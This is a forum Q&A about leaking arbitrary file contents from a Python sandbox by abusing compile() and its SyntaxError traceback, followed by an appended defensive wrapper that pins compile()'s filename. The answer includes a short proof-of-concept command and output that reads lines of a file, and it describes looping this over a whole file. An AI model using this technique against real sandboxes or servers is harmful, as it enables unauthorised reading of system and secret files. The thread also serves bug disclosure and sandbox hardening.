
I am researching this bug here, where the first line of an arbitrary file can be leaked by triggering a SyntaxError using the compile() function.

Is there a method of leaking the rest of the file, such as similar to the way Heartbleed leaks data from server memory?

In Heartbleed, you can open a listener port on your computer and spam the targeted server with a specially crafted request to leak the response bit-by-bit.

I am using a vulnerable python sandbox hosted on a server. The code is compiled on the server. With the bug above I can leak the first line of any file. Is there a way, using only builtins and the standard library, to leak the remaining lines of the file?

isopach

1 Answer


I posted about it on the python bug tracker and got some advice.

Since python interprets files line-by-line, we can delay the termination error, which leads to this interesting bug, simply by adding a new line \n to leak a line at a time.

The proof of concept is as follows:

  1. Create the target file

    $ cat /tmp/passwd
    line 1
    line 2
    line 3
    line 4

  2. Read from the target file

    $ python -c 'compile("\n\n\nyield", "/tmp/passwd", "exec")'
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/passwd", line 4
        line 4
        ^
    SyntaxError: 'yield' outside function

By writing a simple catch loop, it is possible to leak all lines of an unknown file on the system. However, as stated by a reviewer on the tracker, this is only practical for a sandbox escape. Even though Python isn't built for sandboxing, if someone were to implement one, the compile function must be among the first to go.

isopach
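A worked, defender-side version of the mechanism in the answer above, added here as an example and not part of isopach's post: it reproduces the page's compile("\n\n\nyield", path, "exec") call against a constructed temporary file to show that SyntaxError.text is populated from the path on disk, and then shows a guarded compile() wrapper that pins the filename to a fixed pseudo-name so the error can never carry a line from an arbitrary file. The names SANDBOX_FILENAME, guarded_compile, syntax_error_text and run_demo are assumptions for this example, not part of Python or of the sandbox the question describes.

```python
import builtins
import os
import tempfile

# Keep a reference to the real builtin so the guard below can delegate to it.
_real_compile = builtins.compile

# Hypothetical fixed pseudo-filename that sandboxed code is compiled under.
SANDBOX_FILENAME = "<sandbox>"


def syntax_error_text(source, filename):
    """Compile `source` under `filename` and return the SyntaxError's .text
    (the source line CPython attached to the error), or None if it compiled.

    For errors raised after parsing, such as the page's "'yield' outside
    function", CPython fills .text by reading line `lineno` of `filename`
    from disk, which is why an attacker-chosen filename becomes a file read.
    """
    try:
        _real_compile(source, filename, "exec")
    except SyntaxError as err:
        return err.text
    return None


def guarded_compile(source, filename, mode, flags=0, dont_inherit=False, optimize=-1):
    """Drop-in replacement for compile() inside a sandbox: the filename is
    pinned to SANDBOX_FILENAME, so a SyntaxError can never carry a line from
    an arbitrary path. This only closes the filename argument; the tracker
    advice quoted in the answer is to not expose compile() at all."""
    if filename != SANDBOX_FILENAME:
        raise ValueError(
            "compile(): filename %r rejected; only %r is allowed in the sandbox"
            % (filename, SANDBOX_FILENAME)
        )
    return _real_compile(source, filename, mode, flags, dont_inherit, optimize)


def run_demo():
    """Reproduce the page's PoC against a constructed file, then show the
    guard refusing the same call. Returns (leaked_line, guard_blocked)."""
    # Constructed stand-in for the page's /tmp/passwd (not a real secret).
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("line 1\nline 2\nline 3\nline 4\n")
        target = fh.name
    try:
        # Three newlines push `yield` to line 4, so CPython reports line 4 of
        # `target` in the error, just as in the traceback on the page.
        leaked = syntax_error_text("\n\n\nyield", target)
        leaked_line = leaked.rstrip("\n") if leaked is not None else None

        try:
            guarded_compile("\n\n\nyield", target, "exec")
            guard_blocked = False
        except ValueError:
            guard_blocked = True
        return leaked_line, guard_blocked
    finally:
        os.unlink(target)


if __name__ == "__main__":
    line, blocked = run_demo()
    print("unguarded compile() exposed from disk:", repr(line))
    print("guarded compile() blocked the call:", blocked)
    # Legitimate sandbox use still works under the pinned filename.
    code = guarded_compile("x = 40 + 2", SANDBOX_FILENAME, "exec")
    ns = {}
    exec(code, ns)
    print("x =", ns["x"])
```

Running the block prints the leaked fourth line from the temporary file for the raw builtin and True for the guard. The wrapper is deliberately narrow: it only removes the attacker-controlled filename from compile(), and the page's own conclusion still stands that a sandbox should drop compile() altogether rather than rely on a filter around it.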